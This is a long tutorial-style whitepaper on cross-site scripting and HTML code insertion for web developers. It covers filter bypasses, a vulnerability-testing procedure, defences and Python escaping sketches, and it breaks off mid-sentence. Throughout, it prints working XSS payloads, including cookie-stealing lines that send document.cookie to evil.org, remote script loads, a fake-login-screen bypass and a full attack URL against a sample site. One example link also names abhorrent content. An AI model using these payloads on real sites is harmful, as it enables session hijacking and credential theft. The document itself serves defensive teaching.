Introduction
Web servers delivering dynamic
content to Internet clients constitute an integral component of most
organisations' online service offerings. The ability to tune content and
respond to an individual client request represents standard
functionality for any successful site. Unfortunately, due to poorly
developed application code and data processing systems, the majority of
these successful sites are vulnerable to attacks that focus upon the way
HTML content is generated and interpreted by client browsers. Attackers
are often able to embed malicious HTML-based content within client web
requests. With sufficient forethought and analysis, attackers can
exploit these flaws by embedding scripting elements within the returned
content without the knowledge of the site's visitor.
Although the potential dangers have been known for several years, the recent successes and improved understanding of cross-site scripting attacks have increased the importance of correctly handling user input within dynamically generated web content. High-profile sites have already been shown to be susceptible to cross-site scripting attacks. Future attacks are likely to become more sophisticated and, through automation and exploitation of client browser vulnerabilities, many times more devastating.
This document aims to educate those responsible for the management and development of commercial online services by providing the information necessary to understand the significance of the threat, and by providing advice on securing applications against this type of attack.
Code Insertion
The success of this type of
attack hinges upon the functionality of the client browser. In HTML, to
distinguish displayable text from the interpreted markup language, some
characters are treated specially. One of the most common special
characters used to define elements within the markup language is the
“<” character, which is typically used to indicate the beginning of an
HTML tag. These tags can either affect the formatting of the page or
introduce a program that the client browser executes (e.g. the
<SCRIPT> tag introduces a JavaScript program).
As most web browsers are able, by default, to interpret scripts embedded within HTML content, any script content that an attacker successfully injects will likely be executed by the end user within the context of the delivery (e.g. website, HTML help, etc.). Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. The tags most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the injection of malicious scripting code, other tags may be inserted and abused by an attacker. Consider the <FORM> tag: by inserting the appropriate HTML tag information, an attacker could, for instance, modify the behaviour of an existing form and trick visitors to the site into revealing sensitive information. Other HTML tags may be inserted to alter the appearance and behaviour of a page (e.g. alteration of an organisation's online annual accounts or president's statement).
It is important to understand the HTML tags that are most commonly used to carry out code insertion attacks. The following table details the most important attributes of these tags. Note, however, that alternative “in-line” scripting elements, such as javascript:alert('executing script'), may also be used and are interpreted by the current generation of web browsers.
HTML Tag | Description |
<SCRIPT> | Adds a script that is to be used in the document. Attributes: |
<OBJECT> | Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object. Attributes: |
<APPLET> | Used to place a Java applet on a document. It is deprecated in the HTML 4.0 specification in favour of the <OBJECT> tag. Attributes: |
<EMBED> | Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <OBJECT> tag. Attributes: |
<FORM> | Indicates the beginning and end of a form. Attributes: |
Malicious Code
An embedded code attack is
heavily dependent upon the delivery mechanism. Thus the delivery method
often dictates the audience the script will potentially affect.
It is interesting to note that such attacks have been around since before the Internet and HTML. Back in the days of dial-up Bulletin Board Systems (BBS), the problem was site visitors encoding their messages in coloured ASCII; later, the use of vector drawing languages permitted users to redesign pages themselves. Thus many sites hosting discussion groups with user interfaces learnt a long time ago to rigorously control the content that could be submitted.
An early problem for web-based discussion groups was the over-use and unintended misuse of standard HTML tags. For instance, early message boards merely took the user-submitted text from a standard POST form. This data was then added to the discussion page without any further processing. Users often included text formatting tags to bold, italicise or colour their text, giving their message greater visual impact. Unfortunately, it was not uncommon for someone to forget to provide a closing format tag, with the unintended effect of altering every following message on the page. Now consider what the implications would be for everyone viewing the message if a user embedded either of the following two code snippets in their posting.
Hello World! <SCRIPT>malicious code</SCRIPT>
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are
finding ever more ingenious methods of encoding their embedded attacks,
and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a poorly coded search engine. An attacker may be able to embed their malicious code within a hyperlink to the site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site sends a page back to the browser that includes the value of criteria, which consequently forces the execution of code from the attacker's server. For example:
<A
HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to
trusted.org</A>
In the attack above, one source is inserting code into pages sent by another source.
It should be noted that this attack:
• disguises the link as a link to http://trusted.org,
• can be easily included in an HTML email message,
• does not supply the malicious code inline; instead the code is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.
This class of vulnerability is popularly referred to as cross-site scripting (CSS or sometimes XSS).
Cross Site Scripting
A cross-site scripting
vulnerability is caused by the failure of a web-based application to
validate user supplied input before returning it to the client system.
“Cross-Site” refers to the security restrictions that the client browser
usually places on data (i.e. cookies, dynamic content attributes, etc.)
associated with a web site. By causing the victim’s browser to execute
injected code under the same permissions as the web application domain,
an attacker can bypass the traditional Document Object Model (DOM)
security restrictions which can result not only in cookie theft but
account hijacking, changing of web application account settings,
spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access beyond the DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
The most popular (and devastating) CSS/XSS attack is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process. Unfortunately, the mechanism of the attack is very simple and can be easily automated. A paper by iDefence explains the process in detail, but it can be quickly summarised as follows:
- The attacker investigates an interesting site to which normal users must authenticate to gain access, and that tracks the authenticated user through the use of cookies or session IDs.
- The attacker finds a CSS-vulnerable page on the site, for instance http://trusted.org/account.asp.
- Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims.
- Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
- Unknown to the victim, the attacker has now received a copy of their cookie information.
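The root cause in the steps above is that the page echoes the ak parameter back without encoding it. The following is a minimal Python sketch of that difference, not the code of any real site: render_unsafe and render_escaped are hypothetical names, the "Account key" markup is invented for illustration, and html.escape comes from the Python standard library.

```python
import html

# Payload taken from the example link above.
PAYLOAD = ("<script>document.location.replace("
           "'http://evil.org/steal.cgi?'+document.cookie);</script>")


def render_unsafe(ak: str) -> str:
    """Hypothetical vulnerable page: echoes the parameter verbatim."""
    return "<p>Account key: " + ak + "</p>"


def render_escaped(ak: str) -> str:
    """Same page, but the value is HTML-encoded before being written."""
    return "<p>Account key: " + html.escape(ak, quote=True) + "</p>"


unsafe_page = render_unsafe(PAYLOAD)
escaped_page = render_escaped(PAYLOAD)
```

In the first page the browser receives a live <script> element; in the second the same characters arrive as &lt;script&gt; and are displayed as text rather than executed.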
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professionals have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods for doing so.
Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>
http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SCRIPT>
http://trusted.org/COM2.IMG%20src="Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and allows stack traces to be sent to the user's browser, an attacker can construct a URL that will throw an exception and add his malicious script to the end of the request.
http://trusted.org/servlet/org.apache.catalina.servlets.WebdavStatus/<script>code</script>
In the example above, when the Tomcat servlet is called with the trailing illegitimate request, an error page is served containing the offending text verbatim.
Non <SCRIPT> Events
" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string, with the above syntax, into an HTML tag that should have looked like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and the JavaScript code is executed.
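Because the exploit string above works by closing the attribute's quotation mark, encoding quotes as well as angle brackets matters in attribute context. A small Python sketch, assuming a hypothetical template helper named build_link; only html.escape is a real library call.

```python
import html


def build_link(href: str) -> str:
    """Hypothetical template helper: writes a user value into an HREF."""
    # quote=True also encodes " and ', so the value cannot close the attribute.
    return '<A HREF="' + html.escape(href, quote=True) + '">Go</A>'


# An exploit string of the form  " [event]='code'
exploit = "\" onMouseOver='self.location.href=\"http://evil.org/\"'"
link = build_link(exploit)
```

After encoding, the only literal double quotes left in the tag are the two that delimit the HREF value, so the injected onMouseOver text stays inside the attribute instead of becoming an event handler.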
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">
The special character “&” is sometimes interpreted as the start of a new JavaScript code segment (entity).
Typical Payloads Formatting
<img src = "malicious.js">
<script>alert('hacked')</script>
<iframe = "malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'">')</script>
<a href="javascript:…">click-me</a>
Insertion Example
Dynamic URL Generation
Consider an application built for running on Microsoft’s Internet Information Server (IIS) web server platform. Dynamic content is delivered through IIS’s Active Server Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search parameters is constructed as follows:
<A HREF="http://trusted.org/search_main.asp?searchstring=SomeString">click-me</A>
and the ASP code required to generate a further query based upon this submitted information is:
<%
var BaseUrl = "http://trusted.org/search2.asp?searchagain=";
Response.Write("<a href=\"" + BaseUrl + Request.QueryString("SearchString") + "\">click-me</a>");
%>
If the attacker were to replace “SomeString” with their own code, as indicated next:
<a href="http://trusted.org/search_main.asp?SearchString=%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%2Esubmit%3B%27">FooBar</a>
The likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?searchagain="" onmouseover='ClientForm.action="evil.org/get.asp?Data=" + ClientForm.PersonalData;ClientForm.submit;'">click-me</A>
In this case, the attacker has added to the HTML page code, and used the DOM of the HTML page to redirect data in some form to the attacker’s web site.
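To see why the concatenation in the ASP example is dangerous, it helps to decode the attacker's value and compare two ways of building the link. The sketch below is in Python rather than ASP and is only an illustration: link_unsafe and link_safer are hypothetical names, and the event name is written as onmouseover with the line breaks of the printed example removed.

```python
import html
from urllib.parse import quote, unquote_plus

BASE_URL = "http://trusted.org/search2.asp?searchagain="

# Query-string value from the attacker's link above (line breaks removed).
ENCODED = ("%22+onmouseover%3D%27ClientForm%2Eaction%3D%22evil%2Eorg%2Fget"
           "%2Easp%3FData%3D%22+%2B+ClientForm%2EPersonalData%3BClientForm"
           "%2Esubmit%3B%27")

# What the server sees after decoding the request (+ becomes a space).
search_string = unquote_plus(ENCODED)


def link_unsafe(value: str) -> str:
    """Mirrors the vulnerable Response.Write: plain concatenation."""
    return '<a href="' + BASE_URL + value + '">click-me</a>'


def link_safer(value: str) -> str:
    """Percent-encode the value for the URL, then HTML-encode the attribute."""
    url = BASE_URL + quote(value, safe="")
    return '<a href="' + html.escape(url, quote=True) + '">click-me</a>'
```

With link_unsafe the decoded quotation mark ends the HREF early and the onmouseover handler becomes part of the tag; with link_safer the whole value remains a percent-encoded query parameter.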
Bypassing Anti-CSS Filters
A key function of any
application filtering process will be the removal of possibly dangerous
special characters. However, in many circumstances it may be difficult
to filter a large range of these characters due to the application's
unique requirements.
Corporate application developers must carefully evaluate how their code will perform with a variety of attack strings. In addition, they should fully understand the different ways in which special characters can be encoded.
One of the most popular alternative character representations is the escaped (percent) encoding used in URLs, sometimes mistakenly referred to as Unicode encoding. In this system, the hexadecimal value of the ASCII character is prefixed with the “%” character.
Char | ; | / | ? | : | @ | = | & | < | > | " | # |
Code | %3b | %2f | %3f | %3a | %40 | %3d | %26 | %3c | %3e | %22 | %23 |
Char | { | } | | | \ | ^ | ~ | [ | ] | ` | % | ' |
Code | %7b | %7d | %7c | %5c | %5e | %7e | %5b | %5d | %60 | %25 | %27 |
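The codes in the table can be reproduced with a few lines of Python, which may be a convenient way to build test strings. This is only a sketch using the standard urllib.parse module; the variable names are illustrative.

```python
from urllib.parse import quote, unquote

SPECIALS = ";/?:@=&<>\"#{}|\\^~[]`%'"

# safe="" forces every reserved character to be encoded.
# Note: quote() never encodes "~", which it treats as an unreserved character.
table = {ch: quote(ch, safe="").lower() for ch in SPECIALS}

# Decoding is case-insensitive: %3c and %3C both mean "<".
decoded = unquote("%3cscript%3E")
```

Because a server decodes both upper- and lower-case hexadecimal digits, a filter that looks for only one spelling of an encoded character is easily sidestepped.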
Inserting Malicious Code
Simple Filtering of “<” and “>”
Many applications that implement some kind of content filtering will typically filter out the “<” and “>” characters at the client-side. At first glance, this looks like an effective way of ensuring <script> type HTML tags are not possible. Unfortunately, not only is client-side code easy to bypass, in many circumstances the filter itself can be defeated using a mix of alternative character representations and other special characters. Consider a routine that removes the “<” and “>” special characters:
document.write(cleanSearchString('<>'));
The attacker now uses an alternative coding for the filtered characters, “\x3c” and “\x3e” respectively, and initialises their code with “') +” to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'
Commenting Out Malicious Code
Consider an application that filters content on behalf of its clients by causing any scripting content to be “safely” commented out. For instance,
<script>code</script>
is filtered by the application to become:
<COMMENT>
<!--
code (NOT PARSED BY FILTER)
//-->
</COMMENT>
Unfortunately, it is a simple task to bypass the filter. This is accomplished by including script code that will close the <COMMENT> filter process. For example, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
</script>
After processing by the filter, the following code is embedded in the returned document:
<COMMENT>
<!--
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.org/fakeloginscreen.jsp);">
</COMMENT>
This
particular attack was originally designed to bypass the security
filtering processes of a large web-mail provider, and would have been
embedded in HTML email content. Users viewing the email would
automatically be prompted with a fake login screen, making for an easy
method of harvesting user names and passwords.
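The weakness of stripping only “<” and “>” can be demonstrated without a browser. In the Python sketch below, clean_search_string is a hypothetical stand-in for the cleanSearchString routine mentioned earlier, and the final replacement step merely simulates what a JavaScript interpreter does when it evaluates the \x escapes in a string literal.

```python
def clean_search_string(value: str) -> str:
    """Hypothetical stand-in for a filter that only strips < and >."""
    return value.replace("<", "").replace(">", "")


# The attack string from the text: it contains no literal < or >, only
# JavaScript \x escapes, so the filter has nothing to remove.
attack = r"') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'"

filtered = clean_search_string(attack)

# Once a JavaScript interpreter evaluates the string literal, the escapes
# turn back into the filtered characters. Simulated here by replacement.
interpreted = filtered.replace(r"\x3c", "<").replace(r"\x3e", ">")
```

The filter returns the attack string unchanged, and the interpreted result contains a complete <script> element, which is why filtering must account for every representation the receiving context will decode.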
Separate Window Handling
A popular method of handling potentially dangerous URL information is to force the URL to be opened in a new browser window, using the ‘target="_blank"’ addition to the HTML <A> tag. This causes any malicious code to be executed in the context of a different DOM. Unfortunately, in many online email applications it is possible to bypass this protection after analysing the “harmless” link supplied by the site. Consider a site that parses the content,
<a href="javascript:…">click-me</a>
and, after processing, becomes:
<a href="javascript:…" target="_blank">click-me</a>
causing the URL to be opened in a new window. However, if the attacker constructs his HREF as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM.
Escaped JavaScript Entities
In cases where almost all special characters are filtered from user-supplied strings, attackers must encode the entire attack string. Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2
The “%26%7balert%28%27EVIL%27%29%7d%3b” resolves to &{alert('EVIL')}; causing in this instance an unexpected JavaScript alert window to pop up, with the text “EVIL”.
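The escaped-entity example shows why any character check has to run on the decoded value. The following Python sketch decodes the query string with the standard urllib.parse module; looks_dangerous and its FORBIDDEN set are hypothetical and deliberately simplistic, intended only to show the ordering problem.

```python
from urllib.parse import parse_qs, urlsplit

URL = ("http://trusted.org/search.cgi"
       "?query=%26%7balert%28%27EVIL%27%29%7d%3b&apropos=pos2")

# parse_qs percent-decodes each value, as a web server would.
params = parse_qs(urlsplit(URL).query)
query = params["query"][0]

FORBIDDEN = set("<>&{}\"'")


def looks_dangerous(value: str) -> bool:
    """Hypothetical check; only meaningful when given the decoded value."""
    return any(ch in FORBIDDEN for ch in value)
```

Applied to the raw, still-encoded text the check finds nothing, whereas the decoded value is flagged immediately.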
Web Integration
As client web browsers have
evolved, they have incorporated an increasingly diverse range of
functions. At the same time, many common desktop applications have
extended their functionality to replicate or incorporate the
functionality of these same browsers. While the security flaw may be
HTML injection, and more specifically CSS, the avenues available for a
malicious user or attacker to initiate the attack are becoming ever
broader. As is already evident, a popular “personalised” delivery
mechanism has now become HTML email. Unfortunately, the delivery methods
are becoming so diverse that no “single” security solution is available
to prevent the attack. Consider the significance of the following
delivery mechanisms.
The Flash! Attack
Flash! is a popular application
for displaying animated visual information. It has its own development
language (ActionScript) for creating sophisticated interactive menus,
animated movies and games. The most popular web browsers often install
the interpreter for these files by default and, due to the large number
of sites that use the technology, many people will install the
interpreter even if it wasn’t originally available with their web
browser.
ActionScript has an internal function called getURL(). This function is used for redirecting the client browser to another page. Normally the parameter supplied to the function would be a URL. However, due to integration features between the Flash! interpreter and the web browser, it is possible to insert scripting code that would be successfully interpreted by the client web browser.
For instance, instead of:
getURL("http://www.technicalinfo.net")
It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a common file format. The real significance of this threat is that it potentially bypasses many corporate content inspection systems (particularly those that filter out HTML <script> type tags) and local web browser security settings.
For an attack to be successful, the dangerous Flash! file (typically terminating in a “.swf” extension) must be embedded within HTML data for viewing by remote clients. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for instance:
<EMBED
src="http://evil.org/badflash.swf"
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
The Impact
The impact of malicious code
insertion is often difficult to quantify and will change as new
functionality or interactions are incorporated into both web servers and
client browsers. Already, users may unintentionally execute scripts
written by an attacker when they follow untrusted links in web pages,
mail or instant messages, or any other application capable of displaying
HTML content (e.g. Microsoft Help). For this reason, a series of
examples best illustrate the diversity and impact of potential threats.
Consider the following examples:
- An attacker often has access to the document retrieved, since the malicious scripts are executed in a context that appears to have originated from the trusted site. With the appropriate insertions, a script could be used to read fields in a form provided by the trusted server and send this data back to the attacker.
- An attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server.
- An attacker may be able to poison the site's persistent cookies, thus modifying the cookie content and causing malicious code to be executed each time the user visits the trusted site. The malicious code is stored as a field variable within the cookie, and executed each time the site dynamically generates page content without the correct processing.
- An attacker may be able to cause a “hidden window” to start on the client machine and use this to key-log all browser interaction of the victim. Should the victim later visit sites requiring authentication, the attacker could harvest this information.
- CSS type attacks can occur over SSL-encrypted connections. The victim, accessing a trusted host over HTTPS, may still execute an attacker's code unintentionally. If the attacker references document components on a remote host, the victim's client browser may generate a warning message about the insecure connection. However, the attacker can circumvent this warning by simply referencing content on an SSL-capable web server.
- An attacker may construct the malicious code to reference internal resources. Thus, an attacker may gain unauthorised access to an Intranet web server. Only one page on one web server in a domain is required to compromise the entire domain.
- An attacker may be able to bypass policies that prevent the victim's browser from executing scripts. For example, Internet Explorer security “zones” may prevent the execution of scripts from untrusted Internet hosts. An attacker may embed their code within the content of a trusted internal host.
- An attacker may add a social engineering aspect to the attack. Consider an application that requires clients to complete a form to set up their account. An attacker may be able to insert malicious code into their application data. A quick phone call to the corporate help-desk asking for advice on their account may cause the execution of the malicious code on the help-desk system.
- Even if the victim's web browser does not support scripting, an attacker may still be able to alter the content of the page, affecting its appearance, behaviour or normal operation.
- Return results based upon user input to search engines,
- Process credit card information,
- Store user-supplied content in databases and cookies for later retrieval.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is often very simple. The key lies in the analysis of the dynamically generated client-side HTML content. The following process has been frequently used in the past.- For each visible input field (these may be
located in an HTML form, or represented in the URL as “variable=“), try
the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message popup with the text “CSS Vulnerable”, the application component is vulnerable - specifically the input field just checked. - If, either of the above scripting checks cause the HTML page to display incorrectly, the application component may still be vulnerable.
- For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quotes)
On the resultant page, search for the string “<CSS_Check>“. If you discover “<CS_Check>“, it is quite probable that the application component is vulnerable. However, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_Check%gt, then it may not be vulnerable. If input is displayed literally at ANY point in the document, it can be used to divert the flow of execution to an attacker-supplied payload. - Having located the word CSS_Check, verify what (if any) other characters have be altered or filtered from the original string “'';!--"<CSS_Check>= &{()}”. Depending upon the filtered characters, the application component may still be vulnerable.
- Looking closely at the returned HTML code, identify the specific string an attacker would need to break out of the current HTML tag or code sequence. If these characters exist, unfiltered, in responses to the test string of part 3 (above) – then there is a high probability that the application component is vulnerable.
- Moving on from the obvious fields, repeat the process for all the hidden fields not normally editable at the client end. The best method of doing this is through the use of a free local host proxy server such as Achilles by DigiZen Security group and WebProxy by @stake. The proxy servers allow the editing of HTTP requests as they leave the client application, before being finally sent to the server application.
- In many cases, data will be submitted via the HTTP GET request. Throughout the investigation, take note of potentially vulnerable application components that require the HTTP POST command to submit data.
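The check on the returned page can be partly automated. The following Python sketch is one possible way to classify how the probe marker comes back in a response body; the function name and the four result labels are illustrative assumptions, not part of the original procedure, and a manual review of the surrounding HTML is still needed.

```python
import html

# Probe string from the procedure above (it begins with two single quotes).
PROBE = "'';!--\"<CSS_Check>=&{()}"
MARKER = "CSS_Check"


def classify_reflection(body: str) -> str:
    """Classify how the probe marker was returned in a response body."""
    if MARKER not in body:
        return "not reflected"
    if "<" + MARKER + ">" in body:
        # The angle brackets survived untouched: probably vulnerable.
        return "reflected raw"
    if html.escape("<" + MARKER + ">") in body:
        # Returned as &lt;CSS_Check&gt;: may not be vulnerable.
        return "reflected encoded"
    # The marker is present but its brackets were changed or removed.
    return "reflected altered"
```

A result of "reflected altered" means the remaining characters of the probe should be compared by hand against what the server returned.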
Putting It All Together
To bring together many of the
ideas and processes discussed earlier in this document, consider the
following example. An anonymous site has a search engine that responds
to client data submissions. Normally
the site would look like this:
After submitting the test string <script>alert('CSS Vulnerable')</script>
as a search and taking a closer look at the returned content source, we
notice that our sample code appears 21 times in the document, in
various formats.
It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Obviously there are three different server-side processing routines for processing client search data.
- In the first type (ad.uk.doubleclick.net format), it appears that the processing routine changes the case of characters and changes white space to the underscore (“_”).
- The second type (href=) converts special characters into their escape-encoded formats, and white space into the “+” character.
- The third type (document.writeln) places the complete string within a document.writeln JavaScript routine.
Several opportunities present
themselves here. To make the site execute the JavaScript alert box for
each type, we need to force the <script> tags outside of any other
HTML tags. Thus, for each type, the following methods will work:
- ><script>alert('CSS Vulnerable')</script><b a=a
- a></a><script>alert('CSS Vulnerable')</script>
- \'><script>alert%28\'CSS Vulnerable\'%29</script><
However, for this example, we
shall focus on the last type (document.writeln). Since it is possible to
inject code into the HTML page returned by the anonymous news site, to
make the attack interesting, we shall “write” our own fake news article.
Due to the maximum length of any
string we can send to the site, and the likely length of the fake news
article, we shall create a JavaScript include file (.js) which we will
load into the page using:
\'><script%20src%3dhttp://evil.org/faked.js></script>
In this example, the include file will use
multiple document.write statements to create the fake news article.
The key features of the include file are:
- Use of HTML <DIV> tags to position the content on the page. Doing so allows the attacker to cover over existing content as they wish.
- Using a table to keep all the article text together.
- Rewriting of the URL source field at the top of the browser.
- Rewriting of the browser status bar.
var d = document;
d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2">' +
        '<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');
d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');
So far, everything we have
tested on the site makes use of the existing form to submit the
attacker’s code. This submission is done by a HTTP POST command, such
as:
POST /Search HTTP/1.0
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
Content-Length: 135
Pragma: no-cache
dropnav=Pick+a+section&q=\'><script%20src%3dhttp://evil.org/faked.js>
</script>newSearch=true&pro=IT&searchOption=articles
It is a simple process to
convert the HTTP POST into a single URL. Unfortunately for the anonymous
news site, the web application does not differentiate the methods of
receiving data. Thus the following attack URL allows the attacker to
place his own content “on” the site.
http://www.anonymous.com/Search?dropnav=Pick+a+section&q=\'><script
%20src%3dhttp://evil.org/faked.js></script>newSearch=true&pro=IT
&searchOption=articles
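When testing your own application, the same conversion can be used to confirm whether a component accepts its form fields over GET as well as POST. The following Python sketch rebuilds a form-encoded POST body as a query string; the function name is an illustrative assumption, and the example values are harmless placeholders rather than the attack string above.

```python
from urllib.parse import parse_qsl, urlencode


def post_body_to_url(action_url: str, body: str) -> str:
    """Rebuild a form-encoded POST body as a GET URL for the same action."""
    # Decode the body into (name, value) pairs, keeping empty fields.
    fields = parse_qsl(body, keep_blank_values=True)
    # Re-encode the pairs as a query string appended to the action URL.
    return action_url + "?" + urlencode(fields)
```

If the application responds to the resulting URL exactly as it does to the original POST, it does not differentiate between the two delivery methods.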
Defending Against the Attack
Solutions for Users
The only clear-cut solution for
the user is to disable all scripting languages on their computer.
Unfortunately, it is highly likely that much of the functionality of
regularly visited sites will be lost. Thus users should only pursue this
option if they require the lowest possible level of risk.
Alternatively, users must be selective as to the sites they trust, and
the sources of URL links. Again, the disabling of scripting languages
will not prevent attackers influencing the appearance of content
provided by trusted sites by embedding other HTML tags in the URL link.
With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker’s web site may still use scripted code to alter the representation of the links in the client browser.
Unfortunately many integrated applications increase the threat of scripting code being executed on the user's system, particularly through the use of embedded objects such as Flash! .swf files. To prevent these types of attacks, users must either uninstall the interpreters or ensure protection systems are capable of stopping the execution of such content. It is envisaged that popular anti-virus and personal intrusion detection systems will eventually be capable of this.
Frankly, the onus for protecting users against code insertion and CSS type attacks rests upon the development of secure server-side applications. Ideally, the application should correctly handle and comment submitted data. Unfortunately, the likelihood that the application developer will miss some subtle character representation is quite high.
Solutions for Developers and Organisations
As no two applications are ever
the same, application developers will need to tune their security
countermeasures as defined by business requirements. The key to
preventing applications being vulnerable to code injection and CSS type
attacks is by ensuring that dynamically generated page content does not
contain undesired HTML tags.
The most likely sources of malicious data are:
- Query strings
- URLs and pieces of URLs
- Posted data
- Cookies
- Persistent data supplied by users, and retrieved at a later date (such as from databases)
The following methods or design
considerations can be implemented by developers to better secure their
application against HTTP based attacks, not just CSS.
Limit Server Responses
In many cases it may be possible
to limit the amount of “personalised” data that will be returned to
client browsers through the use of generic responses.
For example, consider a site that displays the greeting “Hello, Gunter!” in response to http://trusted.org/greeting.jsp?name=Gunter. It would be a preferable security option to replace this dynamic response with a hard-coded response such as “Hello, User!”
Enforce Response Lengths
For the majority of
applications, the developer should be able to limit the maximum length
of any user-supplied strings. Although initially enforced at the
client-side, all strings should also be checked at the server-side.
Where possible, enforce the limitation of the maximum necessary string
length by truncating any longer responses.
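A minimal Python sketch of the server-side check follows. The limit of 70 characters is an assumption taken from the MAXLENGTH attribute in the earlier search form example, and the function name is hypothetical.

```python
# Assumed limit, mirroring MAXLENGTH="70" on the search field shown earlier.
MAX_QUERY_LENGTH = 70


def enforce_length(value: str, limit: int = MAX_QUERY_LENGTH) -> str:
    """Truncate a user-supplied string to the maximum necessary length."""
    return value[:limit]
```

Truncation alone does not make a value safe; it only reduces the space available to an attacker, so it should be combined with the filtering and encoding measures described later.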
HTTP Referer
As part of the HTTP standard,
provision is made for a field header called “referer”. When a client
browser follows a link or submits form data, the referer field should
contain the URL of the page that the link or data came from. If
possible, the web application should check the referer field and reject
data if it didn’t come from the correct host or link.
Usually appearing in the header of any HTTP request:
Referer: http://www.anonymous.com/Search
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Host: www.anonymous.com
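The referer check described above could be sketched in Python as follows. The trusted host name is taken from the example request, and the function name is an illustrative assumption. Because clients can omit or forge the header, this is best treated as one supplementary check rather than a complete defence.

```python
from urllib.parse import urlsplit

# Assumed host name, taken from the example request in this document.
TRUSTED_HOST = "www.anonymous.com"


def referer_is_trusted(referer, trusted_host: str = TRUSTED_HOST) -> bool:
    """Return True only if the Referer header names the expected host."""
    if not referer:
        # A missing header is rejected in this sketch.
        return False
    parts = urlsplit(referer)
    # Compare the parsed host exactly, so that look-alike hosts such as
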